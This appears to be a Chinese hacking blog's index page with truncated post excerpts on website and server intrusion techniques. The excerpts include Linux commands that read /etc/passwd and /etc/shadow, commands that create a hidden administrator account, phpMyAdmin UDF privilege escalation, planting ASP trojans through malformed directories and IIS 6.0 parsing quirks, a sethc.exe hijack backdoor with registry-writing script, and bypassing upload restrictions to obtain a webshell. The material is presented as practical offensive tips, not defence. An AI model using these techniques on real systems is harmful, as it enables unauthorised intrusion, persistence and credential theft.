Stay Hungry,Stay Foolish(求知若饥,虚心若愚。)——Steve Jobs

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

网络渗透中的一些细节和技巧 后面做了一些补充 关于在phpmyadmin里UDF提权的一些细节 这两天正在渗透某一大型的安全类站点,中间比较累,但确实收获颇多。 大型站点渗透的思路要么就是旁注,要么就是攻陷C段服务器嗅探。因为独立域名服务器,那么就只有从C段下手了。 用iisputscaner扫描...
linux入侵常用命令收集 cat /etc/passwd 查看linux用户 cat /etc/shadow 查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 ifconfig 查看本机...
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆ 用Cmd添加隐藏账户:1,添加账户  2,账户提权  3,隐藏账户  4,隐藏目录 1: net user hacker$ 123 /add 2: net localgroup administrators hacker...
一般拿下PHPMYADMIN后台权限后都会去导出一句话到网站路径里去 ,但是很多 时候 爆不出物理路径 PHP关闭显错了你爆不出来 - -! 于是想了下用phpmyadmin直接UDF 或者mof搞下服务器权限吧 先执行sql select version()查...

浅析路径遍历漏洞

2014.05.07, 经验分享 ,1条评论,3134人打酱油
当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/images /image.jpg”,将读取的内容返回给访问者。 初看,在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“/..”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站...
1、建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\news.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdi...
IIS 6.0 目录解析:/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 后缀解析:/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件...

镜像劫持sethc.exe

2014.04.28, 经验分享 ,2条评论,4037人打酱油
大家都知道Shift后门对应的文件为:sethc.exe 只要把sethc.exe挟持,别人就删不掉了。 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft...
突破您试图从目录中执行 CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序拿webshell。 在上传的时候遇到上传的文件不修改名字,但是上传文件的目录取消了脚本执行权限。 可以试试修改数据包,nc提交来突破,最主要的是上传文件不修改名字。 1.POST /fa-bu/upload/upfile1.as...
感觉思路蛮好的,我就转过来给大家瞧瞧!  ——————————————————–  有时 传了 木马上去后 直接是 xiaoma.asp  还有种 是按照时间生成名字如201103091**************.asp  下面这种如果又 没有回显的话 就可以做 个字典扫  生...